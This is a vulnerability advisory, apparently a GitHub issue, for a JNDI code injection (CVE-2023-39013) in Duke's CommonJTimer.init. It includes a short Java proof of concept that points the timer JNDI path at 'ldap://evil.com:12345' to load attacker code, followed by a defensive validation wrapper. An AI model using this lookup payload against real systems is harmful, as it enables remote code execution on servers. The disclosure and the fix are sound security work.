CVE-2023-39013: There's a code injection vulnerability of `no.priv.garshol.duke.server.CommonJTimer.init` · Issue #273 · larsga/Duke
Duke v1.2 and below was discovered to contain a code injection vulnerability via the component no.priv.garshol.duke.server.CommonJTimer.init.
Affected Version
The latest version 1.2 and below.
Describe the vulnerability
no.priv.garshol.duke.server.CommonJTimer.init(Properties) is designed to initialize a timer. However, passing an unchecked argument to this API can lead to the execution of arbitrary code. For instance, the following code will lead to the execution of arbitrary code from attackers:

```java
import java.util.Properties;
import no.priv.garshol.duke.server.CommonJTimer;

CommonJTimer timer = new CommonJTimer();
Properties timerProperties = new Properties();
// The JNDI path is taken from configuration without validation, so a remote
// LDAP URL makes the lookup contact an attacker-controlled server.
timerProperties.setProperty("duke.timer-jndipath", "ldap://evil.com:12345");
timer.init(timerProperties);
```
To Reproduce
Set up an LDAP server that serves malicious code, then execute the code above to reproduce the issue.
Fix Suggestion
Filter LDAP, RMI and related protocols when performing the JNDI lookup.
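One way to apply that filter, as an added example that is not Duke's own code: a hypothetical `SafeJndiTimerLookup` wrapper that validates the `duke.timer-jndipath` value and refuses any URL-style or non-`java:` JNDI name before calling `InitialContext.lookup`, so remote LDAP/RMI/IIOP/DNS references are rejected before any network contact happens.

```java
import java.util.Locale;
import java.util.Properties;
import javax.naming.InitialContext;
import javax.naming.NamingException;

/** Hypothetical hardening wrapper (not part of Duke) for the timer JNDI lookup. */
public final class SafeJndiTimerLookup {
    // Only container-local names (java:comp/env/..., java:global/...) are accepted.
    private static final String LOCAL_SCHEME = "java:";

    /** Returns true only when the name cannot select a remote JNDI provider. */
    public static boolean isLocalJndiName(String name) {
        if (name == null || name.trim().isEmpty()) {
            return false;
        }
        String lower = name.trim().toLowerCase(Locale.ROOT);
        // "ldap://", "ldaps://", "rmi://", "iiop://", "dns://" and similar
        // URL names make InitialContext.lookup connect to a remote server.
        if (lower.contains("://")) {
            return false;
        }
        // Any other "scheme:" prefix dispatches to a URL context factory for
        // that scheme; only the local "java:" namespace is allowed through.
        int colon = lower.indexOf(':');
        if (colon >= 0 && !lower.startsWith(LOCAL_SCHEME)) {
            return false;
        }
        return true;
    }

    /** Performs the lookup only after the configured path has been validated. */
    public static Object lookupTimer(Properties props) throws NamingException {
        String path = props.getProperty("duke.timer-jndipath");
        if (!isLocalJndiName(path)) {
            // Fail closed: reject the configuration instead of looking it up.
            throw new IllegalArgumentException(
                "duke.timer-jndipath must be a local java: name, got: " + path);
        }
        return new InitialContext().lookup(path);
    }

    public static void main(String[] args) {
        // Constructed sample inputs: the first would be rejected, the second accepted.
        System.out.println(isLocalJndiName("ldap://evil.com:12345"));          // false
        System.out.println(isLocalJndiName("java:comp/env/tm/TimerManager")); // true
    }
}
```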